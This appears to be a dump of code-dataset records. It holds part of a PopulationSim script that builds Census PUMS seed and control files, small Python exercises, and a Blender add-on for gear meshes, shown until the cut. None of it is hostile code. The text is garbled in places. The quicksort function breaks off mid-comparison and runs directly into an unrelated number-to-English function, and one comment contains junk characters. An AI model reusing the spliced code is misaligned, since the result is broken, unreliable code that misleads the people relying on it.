r[\"acs_variables\"].replace('\"', \"\")\n        )\n    dic_margs[geo] = dic_margs[geo][list(dfg.control_field)] # keep only control fields\n\n\n# %%\nctr_geos = {}\nmapping_dict = {4: \"BLKGRPID\", 3: \"TRACTID\", 2: \"COUNTYID\"}\nfor geo, dfm in dic_margs.items():\n    dfm[mapping_dict[dfm.index.nlevels]] = dfm.index.map(\"\".join)\n    dfm.reset_index(drop=True, inplace=True)\n    dfm.fillna(0, inplace=True)\n    dfm.columns = [col.upper() for col in dfm.columns]\n\n    # if \"HHBASE\" in dfm.columns:\n    #    dfm = dfm.loc[dfm.HHBASE >= 0]\n\n    f_output_control = output_control.replace(\".csv\", geo.lower() + \".csv\")\n    ctr_geos[geo] = f_output_control\n\n    print(\" saving controls to: \" + output_folder + f_output_control)\n    dfm.to_csv(output_folder + f_output_control)\n    marginal_summary(dfm)\n
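# How a control expression is evaluated against the downloaded marginals; a
# minimal sketch with two invented ACS variable columns and a hypothetical
# control field name:
import pandas as pd

# Invented ACS variables for a single geography row.
marginals_demo = pd.DataFrame({"B11016_010E": [120.0], "B11016_011E": [45.0]})

# An "acs_variables" expression as it would appear in the pre-control file.
expression = "B11016_010E + B11016_011E"
marginals_demo["HHSIZE1"] = marginals_demo.eval(expression)  # hypothetical field
print(marginals_demo["HHSIZE1"].iloc[0])  # 165.0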
# %% [markdown]\n# step 3. extract PUMS seed households and persons\n\nprint(\"\\nExtracting PUMS seed households and persons from state samples\")\n\n# %%\npuma_lst = df_geo_cross.PUMA.unique()\n\n# %%\nh_pums = pd.read_csv(h_pums_csv, dtype={\"SERIALNO\": str, \"PUMA\": str})\nh_pums = h_pums.set_index(\"SERIALNO\") # keep index as string, one-liner doesn't work\np_pums = pd.read_csv(p_pums_csv, dtype={\"SERIALNO\": str, \"PUMA\": str})\n\n# Census might change variable names by year, changed variables are in region config file\n# https://www2.census.gov/programs-surveys/acs/tech_docs/pums/ACS2019_PUMS_README.pdf?\nh_pums = pums_update(h_pums, conf[\"pums_var_updates\"][acs_year])\np_pums = pums_update(p_pums, conf[\"pums_var_updates\"][acs_year])\n\nemp_df = pd.DataFrame()\nh_samples, p_samples = [], []\ncount = 0\n\nif (acs_year <= 2011) or (acs_year >= 2017):\n    h_pums = h_pums.loc[h_pums.PUMA.isin(puma_lst)]\n    p_pums = p_pums.loc[p_pums.PUMA.isin(puma_lst)]\nelse:\n    pums_grp = {}\n    for pma in [\"PUMA10\", \"PUMA00\"]:\n        pums_grp[pma] = defaultdict(dict)\n        for indx, grp in h_pums.loc[h_pums[pma] != -9].groupby(pma):\n            pums_grp[pma][\"households\"][indx] = grp\n        for indx, grp in p_pums.loc[p_pums[pma] != -9].groupby(pma):\n            pums_grp[pma][\"persons\"][indx] = grp\n        pums_grp[pma][\"households\"][0] = emp_df\n        pums_grp[pma][\"persons\"][0] = emp_df\n\n    for puma in puma_lst:\n        count += 1\n        h_puma = pd.concat(\n            [\n                pums_grp[\"PUMA10\"][\"households\"][int(puma[:5])],\n                pums_grp[\"PUMA00\"][\"households\"][int(puma[5:])],\n            ]\n        )\n        h_puma[\"PUMA\"] = puma\n        h_puma.index = str(count) + h_puma.index\n        h_samples.append(h_puma)\n        p_puma = pd.concat(\n            [\n                pums_grp[\"PUMA10\"][\"persons\"][int(puma[:5])],\n                pums_grp[\"PUMA00\"][\"persons\"][int(puma[5:])],\n            ]\n        )\n        p_puma[\"PUMA\"] = puma\n        p_puma[\"SERIALNO\"] = str(count) + p_puma[\"SERIALNO\"]\n        p_samples.append(p_puma)\n\n    h_pums = pd.concat(h_samples)\n    p_pums = pd.concat(p_samples)\n\nif target != \"housing_units\":\n    h_pums = h_pums.loc[\n        (h_pums.TYPE == 1) & (h_pums.NP > 0)\n    ] # remove group quarters and empty units\np_pums = p_pums.loc[p_pums[\"SERIALNO\"].isin(h_pums.index)]\n\nh_pums, p_pums = preprocess_pums(h_pums, p_pums)\n\n# h_pums[\"hh_id\"] = h_pums.index.values\nh_pums[\"hh_id\"] = range(len(h_pums))\np_pums = pd.merge(\n    p_pums, h_pums[[\"hh_id\"]], left_on=\"SERIALNO\", right_index=True, how=\"left\"\n)\n\nprint(\n    f\"- saving seed households: {output_folder+output_seed_hhs}.| total {str(len(h_pums))} records\"\n)\nh_pums.to_csv(output_folder + output_seed_hhs)\nprint(\n    f\"- saving seed persons: {output_folder+output_seed_persons}.| total {str(len(p_pums))} records\"\n)\np_pums.to_csv(output_folder + output_seed_persons)\n
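# A toy version of the household-id join above, with invented SERIALNO
# values standing in for real PUMS records:
import pandas as pd

households_demo = pd.DataFrame({"NP": [2, 1]},
                               index=pd.Index(["HU001", "HU002"], name="SERIALNO"))
households_demo["hh_id"] = range(len(households_demo))  # sequential ids, as above

persons_demo = pd.DataFrame({"SERIALNO": ["HU001", "HU001", "HU002"],
                             "AGEP": [34, 31, 70]})
persons_demo = pd.merge(persons_demo, households_demo[["hh_id"]],
                        left_on="SERIALNO", right_index=True, how="left")
print(persons_demo)  # each person row carries its household's hh_id

# %% [markdown]
# step 4. 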
modify popsim config\nprint(\"\\nupdate popsim settings\")\n\n# %%\nSORT_ORDER = [\n \"REGION\",\n \"PUMA\",\n \"MCD\",\n \"SAMPLEGEO\",\n \"TRACT\",\n \"BLKGRP\",\n \"TAZ\",\n \"BLK\",\n \"BUILDING\",\n]\nsorted_geos = list(ctr_geos.keys())\nsorted_geos.sort(key=lambda val: SORT_ORDER.index(val))\n\n\n# %%\nprj_settings = yaml.load(open(settings_file, \"r\"), Loader=yaml.FullLoader)\n\n# %%\ngeos = sorted_geos + [\"REGION\", \"PUMA\"]\ngeos.sort(key=lambda val: SORT_ORDER.index(val))\nprj_settings[\"geographies\"] = geos # sort by predefined order)\nprj_settings[\"seed_geography\"] = \"PUMA\"\n\nprj_settings[\"data_dir\"] = \"data/\" + str(acs_year)\n\n# %%\nfor litem in prj_settings[\"input_table_list\"]:\n if litem[\"tablename\"] == \"households\":\n litem[\"filename\"] = output_seed_hhs\n if litem[\"tablename\"] == \"persons\":\n litem[\"filename\"] = output_seed_persons\n if litem[\"tablename\"] == \"geo_cross_walk\":\n litem[\"filename\"] = output_geo_cross\n if \"_control_data\" in litem[\"tablename\"]:\n geo = litem[\"tablename\"].replace(\"_control_data\", \"\")\n if geo not in ctr_geos.keys():\n prj_settings[\"input_table_list\"].remove(litem)\n else:\n litem[\"filename\"] = ctr_geos[geo]\n del ctr_geos[geo]\nfor k in ctr_geos:\n prj_settings[\"input_table_list\"].append(\n {\"tablename\": k + \"_control_data\", \"filename\": ctr_geos[k]}\n )\n\n# %%\nprj_settings[\"control_file_name\"] = \"{}_{}_controls.csv\".format(prj_name, str(acs_year))\nprj_settings[\"output_tables\"] = {\n \"action\": \"include\",\n \"tables\": [\"summary_\" + x for x in sorted_geos],\n}\n\n\nsub_bal_lst = [\"sub_balancing.geography=\" + x for x in sorted_geos]\nprj_settings[\"run_list\"][\"steps\"] = (\n [\n \"input_pre_processor\",\n \"setup_data_structures\",\n \"initial_seed_balancing\",\n \"meta_control_factoring\",\n \"final_seed_balancing\",\n \"integerize_final_seed_weights\",\n ]\n + sub_bal_lst\n + [\"expand_households\", \"summarize\", \"write_tables\", \"write_synthetic_population\"]\n)\n\nwith open(\n \"{}{}_{}_settings.yaml\".format(output_folder, prj_name, acs_year), \"w\"\n) as yaml_file:\n yaml.dump(prj_settings, yaml_file, default_style=None, default_flow_style=False)\n\n\n# %% [markdown]\n# # copy pre control file\nprint(\"copy popsim master control file\")\nshutil.copy(\n pre_control, output_folder + \"{}_{}_controls.csv\".format(prj_name, str(acs_year)),\n)\n\n# %%\nprint(\n \"\\ntotal time: {} seconds\".format(round(time.time() - t0, 1)),\n \"\\nDone. 
All files are saved to \" + output_folder,\n \"\\nTo run Populationsim:\",\n '\\n\\t copy new settings and controls to configs folder and rename \"xxx_settings.yaml\" to \"settings.yaml\"',\n f\"\\n\\t copy other files in {acs_year}/data folder to data/{acs_year}/\",\n)\n\n","sub_path":"input_prep/popsim_input_maker.py","file_name":"popsim_input_maker.py","file_ext":"py","file_size_in_byte":13212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"281174189","text":"# Ejercicio 3.1\n\n\ndef converterToSeconds(hh, mm, ss):\n seconds = ss\n seconds += mm * 60\n seconds += hh * 3600\n\n return seconds\n\n\ndef converToHHSS(seconds):\n m = seconds / 60\n s = seconds % 60\n h = m / 60\n m = m % 60\n return h, m, s\n","sub_path":"Python/Class2/exercise_7.py","file_name":"exercise_7.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"592578826","text":"#Quick Sort(n*logn)-մեծ չափերի համար\ndata=[4,5,1,3,7,2,6,8]\n\ndef get_pivot(data,l,r):\n middleindex=(l+r)//2\n if (data[l]>=data[r] and data[l]<=data[middleindex]) or (data[l]<=data[r] and data[l]>=data[middleindex]):\n pivotindex=l\n elif (data[r]>=data[l] and data[r]<=data[middleindex]) or (data[r]<=data[l] and data[r]>=data[middleindex]):\n pivotindex=r\n elif (data[middleindex]>=data[l] and data[middleindex]<=data[r]) or (data[middleindex]<=data[l] and data[middleindex]>=data[r]):\n pivotindex=middleindex\n return pivotindex\n\ndef sort(data,l,r):\n pivotindex=get_pivot(data,l,r)\n pivotvalue=data[pivotindex]\n data[l],data[pivotindex]=data[pivotindex],data[l]\n border=l\n for i in range(l,r+1):\n if data[i]= 100:\n #print (\"invalid\")\n return \"invalid\"\n exit()\n else:\n number = str(number)\n leng = len(number)\n if leng == 1:\n num = once(number)\n return num\n if leng == 2:\n num = ten(number)\n return num\n #print (num)\n #print(tens_to_english(number))\n\n#print (checkValid(3))","sub_path":"HW5/num2eng4_t.py","file_name":"num2eng4_t.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"304363184","text":"#\n# ____ ________.___._______ .___ ____ ___ _____\n# \\ \\/ /\\__ | |\\ \\ | | | \\/ \\\n# \\ / / | |/ | \\| | | / \\ / \\\n# / \\ \\____ / | \\ | | / Y \\\n# /___/\\ \\ / ______\\____|__ /___|______/\\____|__ /\n# \\_/ \\/ \\/ \\/\n#\n# last mod 20 dec 2019 change to 2.8\n#\n# Feedback xynium@laposte.net\n\n\n# notes :\n# Backlash should be arond .99\n# With 20deg of pressure angle minimal tooth number is 13 check pinion\n#\n# For crown train add backlash 0.99\n\n# TODO For rack close mesh has to close the end of the rack\n# TODO Has we dublicate a whole tooth there is vertices in common -> need a cleanup for duplicate vertice\n\nimport bpy\n# from mathutils import *\nfrom math import sin, cos, tan, pi, atan, sqrt\n# from bpy.props import *\n\nbl_info = {\n \"name\": \"Gear\",\n \"description\": \"Add a gear mesh.\",\n \"author\": \"XYNIUM JP Lathuile\",\n \"version\": (1, 0),\n \"blender\": (2, 80, 0),\n \"location\": \"View3D > Add > Mesh\",\n \"warning\": \"\",\n \"support\": \"TESTING\",\n \"category\": \"Add Mesh\",\n}\n\nglobal PitchRadius, TeethN, PressureAng, Addendum, Dedendum, Fillet, Resolution, Thickness\nglobal HelicalAng, Width, LongRes, prop, Alpha, toDel, N, Pinion, CloseObj, jeu\nglobal nIntoth, ax\n\n\n#####################################\n# Main Add Mesh Gear + 
Pinion\n#####################################\n\n\nclass ObjectGear(bpy.types.Operator):\n    bl_idname = \"mesh.primitive_gear\"\n    bl_label = \"Add a Gear\"\n    bl_options = {'REGISTER', 'UNDO', 'PRESET'}\n\n    global toDel\n\n    toDel = 0\n    # default blender is mm\n    UseMod = bpy.props.BoolProperty(name=\"Use module\", default=True)\n    Pinions = bpy.props.BoolProperty(name=\"Pinion\", default=False)\n    Adv = bpy.props.BoolProperty(name=\"Advanced setting\", default=False)\n    CloseObjs = bpy.props.BoolProperty(name=\"Close Mesh\", default=False)\n    TeethNs = bpy.props.IntProperty(name=\"Teeth Number\", default=40, min=9, soft_max=200)\n    PitchRadiuss = bpy.props.FloatProperty(name=\"Reference Radius\", min=0.5, soft_max=200, default=20, unit='LENGTH',\n                                           description=\"Pitch Radius\")\n    PressureAngs = bpy.props.IntProperty(name=\"Pressure angle\", default=20, min=10, max=40)\n    HelicalAngs = bpy.props.IntProperty(name=\"Tooth angle\", default=0, min=-45, max=45,\n                                        description=\"Angle of the tooth in a helical (spiral) gear\")\n    Addendums = bpy.props.FloatProperty(name=\"Addendum\", min=0.001, soft_max=30, default=1, precision=1, unit='LENGTH',\n                                        description=\"Addendum\")\n    Dedendums = bpy.props.FloatProperty(name=\"Dedendum\", min=0.001, soft_max=30, default=1, precision=1, unit='LENGTH',\n                                        description=\"Dedendum\")\n    Fillets = bpy.props.FloatProperty(name=\"Fillet\", min=0.0001, soft_max=1, default=0.05, precision=2, unit='LENGTH',\n                                      description=\"Fillet\")\n    Resolutions = bpy.props.IntProperty(name=\"Resolution\", default=3, min=1, max=7,\n                                        description=\"Resolution of the tooth profile\")\n    LongRess = bpy.props.IntProperty(name=\"Long. Res.\", default=5, min=1, max=25,\n                                     description=\"Resolution along the tooth extrusion\")\n    Thicknesss = bpy.props.FloatProperty(name=\"Thickness\", default=5, min=0.05, soft_max=200, unit='LENGTH',\n                                         description=\"Thickness of the tooth extrusion\")\n    Widths = bpy.props.FloatProperty(name=\"Axis\", min=0.01, soft_max=200, default=6, unit='LENGTH', precision=1,\n                                     description=\"Concentric inner extrusion from inner tooth\")\n    props = bpy.props.EnumProperty(name=\"Type\", items=[(\"nor\", \"Normal\", \"Spur gear\"), (\"con\", \"Conical\",\n                                   \"Conical gear\"), (\"cro\", \"Crown\", \"Crown\"), (\"rac\", \"Rack\", \"Rack\")], default=\"nor\")\n    Alphas = bpy.props.IntProperty(name=\"Cone Angle\", default=90, min=10, max=180,\n                                   description=\"Full Angle at vertex cone\")\n    Ns = bpy.props.FloatProperty(name=\"Multiply Rate\", default=2, min=0.01, soft_max=30, description=\"Multiplying rate\")\n    jeus = bpy.props.FloatProperty(name=\"Backlash\", default=1, min=0.6, max=1, precision=3, description=\"Backlash\")\n\n    def draw(self, context):\n        layout = self.layout\n\n        box = layout.box()\n        box.prop(self, 'UseMod')\n        box.prop(self, 'Pinions')\n        box.prop(self, 'Adv')\n        box.prop(self, 'CloseObjs')\n        box.prop(self, 'props')\n        box.prop(self, 'TeethNs')\n        box.prop(self, 'PitchRadiuss')\n        box.prop(self, 'Thicknesss')\n        box.prop(self, 'Widths')\n\n        if self.Adv is True:\n            boxa = layout.box()\n            boxa.prop(self, 'PressureAngs')\n            boxa.prop(self, 'HelicalAngs')\n            boxa.prop(self, 'jeus')\n            boxa.prop(self, 'Resolutions')\n            boxa.prop(self, 'LongRess')\n\n        if self.UseMod is False:\n            boxb = layout.box()\n            boxb.prop(self, 'Addendums')\n            boxb.prop(self, 'Dedendums')\n            boxb.prop(self, 'Fillets')\n\n        if self.props == \"con\":\n            boxc = layout.box()\n            boxc.prop(self, 'Alphas')\n\n        if self.Pinions is True:\n            boxd = layout.box()\n            boxd.prop(self, 'Ns')\n\n    def execute(self, context):\n        global 
PitchRadius, TeethN, PressureAng, Addendum, Dedendum, Fillet, Bevel, Resolution, Thickness\n global prop, Alpha, toDel, N, Pinion, CloseObj, jeu, LongRes, HelicalAng, Width\n\n # create mesh\n PitchRadius = self.PitchRadiuss\n TeethN = self.TeethNs\n PressureAng = self.PressureAngs\n Addendum = self.Addendums\n Dedendum = self.Dedendums\n Fillet = self.Fillets\n Bevel = 0\n Resolution = self.Resolutions\n Thickness = self.Thicknesss\n LongRes = self.LongRess\n HelicalAng = self.HelicalAngs\n Width = self.Widths\n Alpha = self.Alphas\n prop = self.props\n N = self.Ns\n Pinion = self.Pinions\n CloseObj = self.CloseObjs\n jeu = self.jeus\n\n if self.UseMod is True:\n module = 2.0 * PitchRadius / TeethN\n Addendum = module\n Dedendum = 1.25 * module\n Fillet = 0.3 * module\n Bevel = 0.25 * module\n if (prop == \"con\") and (Pinion is True):\n # Compute cone angle\n pTeethN = int(TeethN / N)\n N1 = TeethN/pTeethN\n Alpha = Alpha*pi/180.0\n Alpha1 = atan(sin(Alpha)/(N1+cos(Alpha)))\n Alpha = 2*(Alpha-Alpha1)*180/pi\n verts, faces = add_gear()\n if toDel == 1:\n #bpy.ops.object.mode_set(mode='OBJECT') #add 1712\n bpy.ops.object.delete()\n\n obj = create_mesh_object(context, verts, [], faces, \"Gear\")\n toDel = 1\n # duplique les dents spin\n bpy.ops.object.mode_set(mode='EDIT')\n if (prop == \"rac\"):\n DiametralPitch = 2*pi*PitchRadius/TeethN\n for k in range(TeethN):\n bpy.ops.mesh.duplicate_move(TRANSFORM_OT_translate={\"value\": (0, DiametralPitch, 0)})\n else:\n bpy.ops.mesh.spin(steps=TeethN, dupli=True, angle=2*pi, center=bpy.context.scene.cursor.location,axis=(0.0, 0.0, 1.0))\n bpy.ops.mesh.delete(type='VERT')\n bpy.ops.object.mode_set(mode='OBJECT')\n if Pinion is True:\n Rg = PitchRadius\n pTeethN = int(TeethN / N)\n Rp = PitchRadius * pTeethN / TeethN\n if (prop == \"con\"):\n Alpha = 2*Alpha1*180/pi\n PitchRadius = Rp\n TeethN = pTeethN\n HelicalAng = -HelicalAng\n verts, faces = add_gear(pinion=True)\n objp = create_mesh_object(context, verts, [], faces, \"Pinion\")\n # Move center\n paxis = (0.0, 0.0, 1.0)\n #changed obj to bpy.context. le 19/12\n #objectToSelect = bpy.data.objects[\"objectName\"]\n #objectToSelect.select_set(True)\n #bpy.context.view_layer.objects.active = obj #2012 selcted object suposed to be pinion\n print('Debug test') # to be displayed launch from terminal\n\n if (prop == \"nor\" or prop == \"con\"):\n pcenter = (bpy.context.object.location[0]+Rp+Rg, bpy.context.object.location[1], bpy.context.object.location[2])\n if (prop == \"cro\"):\n pcenter = (bpy.context.object.location[0]+Rg-Rp, bpy.context.object.location[1], bpy.context.object.location[2])\n if (prop == \"rac\"):\n pcenter = (bpy.context.object.location[0]+Rp, bpy.context.object.location[1], bpy.context.object.location[2])\n #bpy.context.view_layer.objects.active = objp #2012\n bpy.context.object.location = pcenter #changed objp to bpy.context. 
le 19/12\n bpy.ops.object.mode_set(mode='EDIT')\n bpy.ops.mesh.spin(steps=TeethN, dupli=True, angle=2*pi, center=pcenter, axis=paxis)\n bpy.ops.mesh.delete(type='VERT')\n bpy.ops.object.mode_set(mode='OBJECT')\n if (prop == \"con\"):\n bpy.ops.transform.rotate(value=-self.Alphas*pi/180.0, orient_axis='Y')\n bpy.context.object.location[0] = -Rg # bpy.context.object.location[0] + Rg\n bpy.context.object.location[2] = Rp # bpy.context.object.location[2] + Rp\n return {'FINISHED'}\n\n\nclass INFO_MT_mesh_gear_add(bpy.types.Menu):\n # Define the \"Gears\" menu\n bl_idname = \"INFO_MT_mesh_gear_add\"\n bl_label = \"Gear\"\n\n def draw(self, context):\n layout = self.layout\n layout.operator_context = 'INVOKE_REGION_WIN'\n layout.operator(\"mesh.primitive_gear\", text=\"Mesh Gear\")\n # layout.operator(\"mesh.primitive_animate_gear\", text=\"Animate Gear\")\n\n\n# Define \"Extras\" menu\ndef menu_func(self, context):\n self.layout.operator(ObjectGear.bl_idname, text=\"Gear\", icon=\"PLUGIN\")\n\n\ndef register():\n bpy.utils.register_class(ObjectGear)\n bpy.types.VIEW3D_MT_mesh_add.append(menu_func)\n\n\ndef unregister():\n bpy.utils.unregister_class(ObjectGear)\n bpy.types.VIEW3D_MT_mesh_add.remove(menu_func)\n\nif __name__ == \"__main__\":\n register()\n\n\n# Create a new mesh (object) from verts/edges/faces.\n# verts/edges/faces ... List of vertices/edges/faces for the\n# new mesh (as used in from_pydata).\n# name ... Name of the new mesh (& object).\n\ndef create_mesh_object(context, verts, edges, faces, name):\n\n # Create new mesh\n mesh = bpy.data.meshes.new(name)\n\n # Make a mesh from a list of verts/edges/faces.\n mesh.from_pydata(verts, edges, faces)\n\n # Update mesh geometry after adding stuff.\n mesh.update()\n\n from bpy_extras import object_utils\n return object_utils.object_data_add(context, mesh, operator=None)\n\n\n####################################################################\n# Do The Gear\n####################################################################\n\ndef add_gear(pinion=False):\n global PitchRadius, Alpha, prop, N, Pinion, TeethN, HelicalAng\n\n ####################################################################\n # Main Gear\n ####################################################################\n\n if (prop == \"nor\" or pinion is True or prop == \"con\"):\n (verts, faces) = TheTooth(0, 0, piniont=pinion)\n if (prop == \"con\"):\n AlphaG = Alpha*pi/360.0\n verts = ConifyTooth(verts, AlphaG)\n\n if (prop == \"cro\" and pinion is False):\n (verts, faces) = TheTooth(0, 1)\n\n if (prop == \"rac\" and pinion is False):\n (verts, faces) = TheTooth(1, 0)\n\n return verts, faces\n\n\n####################################################################\n# CREATES THE BASE PROFILE\n####################################################################\n\ndef TheTooth(Rack, Crown, piniont=False):\n\n verts = []\n faces = []\n\n if (Rack == 1):\n (Vert, Norm) = RackOutline()\n else:\n (Vert) = ToothOutline(piniont)\n\n b = 0\n Thicn = Thickness / 2\n Psi = HelicalAng*pi/180.0\n # Special po les engrens droit le nombre de vertice est special\n if prop == \"nor\" or prop == \"con\" or piniont is True:\n ###################################################################\n # make thickness\n for i in range(LongRes):\n z = Thicn - (Thickness)*(i)/(LongRes-1)\n sq = z*tan(Psi)\n Phi = sq/PitchRadius\n\n for j in range(len(Vert)):\n p = Vert[j]\n\n x = p[0]\n y = p[1]\n verts.append((x*cos(Phi)+y*sin(Phi), -x*sin(Phi)+y*cos(Phi), z))\n\n 
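# Each z-slice of the extruded tooth above is rotated by an angle
# proportional to its height, which is what produces the helix; a standalone
# sketch of that per-slice rotation:
from math import cos, sin, tan, radians

def twist(x, y, z, pitch_radius, helix_deg):
    # As in the loop above: arc swept at height z is sq = z*tan(psi),
    # giving a rotation angle phi = sq / R at the reference radius.
    phi = z * tan(radians(helix_deg)) / pitch_radius
    return (x * cos(phi) + y * sin(phi),
            -x * sin(phi) + y * cos(phi),
            z)

print(twist(20.0, 1.5, 2.5, pitch_radius=20.0, helix_deg=15.0))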
####################################################################\n # make Faces\n NV = len(Vert)\n NL = LongRes-1\n N2 = Resolution\n FVC = len(verts)\n\n for i in range(NL):\n for j in range(NV-1):\n faces.append((i*(NV)+j, i*(NV)+j+1, (i+1)*(NV)+j+1, (i+1)*(NV)+j))\n ####################################################################\n # make top\n p0 = verts[0]\n p1 = verts[NV-1]\n th0 = atan(p0[1]/p0[0])\n th1 = atan(p1[1]/p1[0])\n R = PitchRadius\n N = 2*Resolution\n Wid = PitchRadius-Width\n\n for i in range(N+1):\n th = (th1-th0)*i/(N)+th0\n verts.append(((R-Wid)*cos(th), (R-Wid)*sin(th), Thickness/2.0))\n verts.append((R*cos((th1+th0)/2.0), R*sin((th1+th0)/2.0), Thickness/2.0))\n\n for i in range(N2-1):\n faces.append((i, i+1, FVC+i+1, FVC+i))\n\n faces.append((N2-1, FVC+N+1, FVC+N2, FVC+N2-1))\n\n for i in range(2*nIntoth+N-1):\n faces.append((N2+i-1, N2+i, FVC+N+1))\n\n faces.append((FVC+N2, FVC+N+1, NV-N2, FVC+N2+1))\n\n for i in range(N2-1):\n faces.append((NV-N2+i, NV-N2+i+1, FVC+N2+i+2, FVC+N2+i+1))\n\n # make bottom\n F1 = NL*NV\n FVT = FVC\n FVC = len(verts)\n tha = th1\n th1 = -th0\n th0 = -tha\n\n for i in range(N+1):\n th = ((th1-th0)*i/(N)+th0)\n verts.append(((R-Wid)*cos(th), (R-Wid)*sin(th), -Thickness/2.0))\n verts.append((R*cos((th1+th0)/2.0), R*sin((th1+th0)/2.0), -Thickness/2.0))\n\n for i in range(N2-1):\n faces.append((F1+i, F1+i+1, FVC+i+1, FVC+i))\n\n faces.append((F1+N2-1, FVC+N+1, FVC+N2, FVC+N2-1))\n\n for i in range(2*nIntoth+N-1):\n faces.append((F1+N2+i-1, F1+N2+i, FVC+N+1))\n\n faces.append((FVC+N2, FVC+N+1, F1+NV-N2, FVC+N2+1))\n\n for i in range(N2-1):\n faces.append((F1+NV-N2+i, F1+NV-N2+i+1, FVC+N2+i+2, FVC+N2+i+1))\n\n # Close the mesh\n if CloseObj is True:\n for i in range(N):\n faces.append((FVC+i, FVC+i+1, FVT+i+1, FVT+i))\n\n # case crown and rack\n else:\n if prop == \"cro\":\n (verts, faces) = SolCrown(Vert)\n elif piniont is False:\n\n ####################################################################\n # First Vertices\n\n for i in range(Resolution+1):\n chi = (i/(1.0*Resolution))*pi/2.0\n z = Thicn-b*(1-cos(chi))\n sq = z*tan(Psi)\n\n for j in range(len(Vert)):\n p = Vert[j]\n m = Norm[j]\n x = p[0]+b*(1-sin(chi))*m[0]\n y = p[1]+b*(1-sin(chi))*m[1]\n verts.append((x, y - sq, z))\n\n for i in range(LongRes):\n z = Thicn - b - (Thickness-2.0*b) * (i+1) / LongRes\n sq = z*tan(Psi)\n\n for j in range(len(Vert)):\n p = Vert[j]\n x = p[0]\n y = p[1]\n verts.append((x, y - sq, z))\n\n for i in range(Resolution):\n chi = (1.0-(i+1) / (1.0*Resolution)) * pi / 2.0\n z = - Thicn + b * (1-cos(chi))\n sq = z*tan(Psi)\n\n for j in range(len(Vert)):\n p = Vert[j]\n m = Norm[j]\n x = p[0]+b*(1-sin(chi))*m[0]\n y = p[1]+b*(1-sin(chi))*m[1]\n verts.append((x, y - sq, z))\n\n ####################################################################\n # Then Faces\n NV = len(Vert)\n NL = 2*Resolution+LongRes\n FVC = len(verts)\n\n for i in range(NL):\n for j in range(NV-1):\n faces.append((i*(NV)+j, i*(NV)+j+1, (i+1)*(NV)+j+1, (i+1)*(NV)+j))\n\n ####################################################################\n # Add Width\n #\n # TOP\n\n p0 = verts[0]\n p1 = verts[NV-1]\n y0 = p0[1]\n y1 = p1[1]\n x0 = p0[0]\n N = 2*Resolution\n Wid = Width\n\n for i in range(N):\n y = (y1-y0)*i/(N-1)+y0\n verts.append(((x0-Wid), y, Thickness/2.0))\n verts.append((x0, (y1+y0)/2.0, Thickness/2.0))\n\n for i in range(N-1):\n faces.append((i, i+1, FVC))\n\n for i in range(Resolution-1):\n faces.append((i+N-1, i+N, FVC+i+1, FVC+i))\n\n faces.append((int(N+N/2-2), 
int(N+N/2-1), FVC+N, int(FVC+N/2-1)))\n faces.append((int(FVC+N/2-1), FVC+N, int(FVC+N/2)))\n\n for i in range(6*N):\n faces.append((int(N+N/2+i-1), int(N+N/2+i), FVC+N))\n\n faces.append((int(FVC+N/2), FVC+N, int(NV-N-N/2), int(NV-N-N/2+1)))\n\n for i in range(Resolution-1):\n faces.append((int(NV-N-N/2+i+1), int(NV-N-N/2+i+2), int(FVC+N/2+i+1), int(FVC+N/2+i)))\n\n for i in range(N-1):\n faces.append((NV-i-2, NV-i-1, FVC+N-1))\n\n # BOTTOM\n F1 = NL*NV\n FVT = FVC\n FVC = len(verts)\n ya = y1\n y1 = - y0\n y0 = - ya\n Wid = Width\n for i in range(N):\n y = (y1-y0)*i/(N-1)+y0\n verts.append(((x0-Wid), y, -Thickness/2.0))\n verts.append((x0, (y1+y0)/2.0, -Thickness/2.0))\n\n for i in range(N-1):\n faces.append((F1+i, F1+i+1, FVC))\n\n for i in range(Resolution-1):\n faces.append((F1+i+N-1, F1+i+N, FVC+i+1, FVC+i))\n\n faces.append((int(F1+N+N/2-2), int(F1+N+N/2-1), FVC+N, int(FVC+N/2-1)))\n faces.append((int(FVC+N/2-1), FVC+N, int(FVC+N/2)))\n\n for i in range(6*N):\n faces.append((int(F1+N+N/2+i-1), int(F1+N+N/2+i), FVC+N))\n\n faces.append((int(FVC+N/2), FVC+N, int(F1+NV-N-N/2), int(F1+NV-N-N/2+1)))\n\n for i in range(Resolution-1):\n faces.append((int(F1+NV-N-N/2+i+1), int(F1+NV-N-N/2+i+2), int(FVC+N/2+i+1), int(FVC+N/2+i)))\n\n for i in range(N-1):\n faces.append((F1+NV-i-2, F1+NV-i-1, FVC+N-1))\n\n # Close the mesh\n if CloseObj is True:\n for i in range(N):\n faces.append((FVC+i, FVC+i+1, FVT+i+1, FVT+i))\n # if(Rack==1):\n # faces.append((F1+NV-2, FVC, FVT, NV-2))\n # faces.append((F1+NV-N, FVC+N, FVT+N, NV-N))\n\n return verts, faces\n\n\n####################################################################\n# Deform base profile to cone\n####################################################################\n\ndef ConifyTooth(verts, Alpha):\n\n vertsr = []\n\n R = PitchRadius\n Zo = Thickness/2.0\n h = R/tan(Alpha)\n for v in verts:\n x = v[0]\n y = v[1]\n z = v[2]+Zo\n\n r = sqrt(x*x+y*y)\n phi = atan(y/x)\n\n Rr = R + (r-R)*cos(Alpha)\n Rz = (r-R)*sin(Alpha)\n\n Mod = sqrt(Rr*Rr+(Rz-h)*(Rz-h))\n\n rc = Rr - z * Rr/Mod\n zc = Rz + z * (h-Rz)/Mod\n\n vertsr.append((rc*cos(phi), rc*sin(phi), zc))\n\n return vertsr\n\n\n####################################################################\n# CREATES THE BASE INVOLUTE PROFILE\n####################################################################\n\ndef ToothOutline(pinion=False):\n global nIntoth, ax, Fillet\n\n ####################################################################\n # Compute ;ù@j_{[#\n #\n\n Ag = PressureAng * pi / 180.0\n if prop == \"cro\" and pinion is False:\n # page T23\n module = 2.0 * PitchRadius / TeethN\n # Cas la distance entraxe est fixé on corrige la longueur dent\n # Pteeth=int(TeethN/N)\n # x=PitchRadius*(1-Pteeth/TeethN)\n # y=(ax/module)-(TeethN-Pteeth)/2\n # alphaw=acos((TeethN-Pteeth)*cos(Ag)/(2*y+TeethN-Pteeth))\n # x=(TeethN-Pteeth)*(tan(alphaw)-alphaw-tan(Ag)+Ag)/(2*tan(Ag))\n x = 0\n Bottom = PitchRadius - (1-x) * module\n Ded = Bottom\n Add = Bottom + 